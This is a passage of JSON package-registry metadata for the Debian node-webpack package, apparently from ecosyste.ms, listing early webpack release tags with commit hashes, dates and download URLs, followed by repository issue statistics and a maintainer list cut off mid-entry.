ebpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-22T20:12:37.296Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":0.019293845263360986,"forks_count":0.02894076789504148,"docker_downloads_count":null,"average":0.012058653289600617},"purl":"pkg:deb/debian/node-webpack?arch=source\u0026distro=debian-12","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/debian/node-webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/debian/node-webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/debian/node-webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T17:39:29.481Z","issues_count":10162,"pull_requests_count":9399,"avg_time_to_close_issue":10837189.563112684,"avg_time_to_close_pull_request":2756725.7170131044,"issues_closed_count":9895,"pull_requests_closed_count":8852,"pull_request_authors_count":1443,"issue_authors_count":6683,"avg_comments_per_issue":5.834776618775831,"avg_comments_per_pull_request":3.1609745717629534,"merged_pull_requests_count":5992,"bot_issues_count":8,"bot_pull_requests_count":2909,"past_year_issues_count":80,"past_year_pull_requests_count":908,"past_year_avg_time_to_close_issue":899649.5272727272,"past_year_avg_time_to_close_pull_request":370883.2323943662,"past_year_issues_closed_count":55,"past_year_pull_requests_closed_count":710,"past_year_pull_request_authors_count":80,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4125,"past_year_avg_comments_per_pull_request":4.709251101321586,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":138,"past_year_merged_pull_requests_count":559,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1057,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"hai-x","count":123,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/aut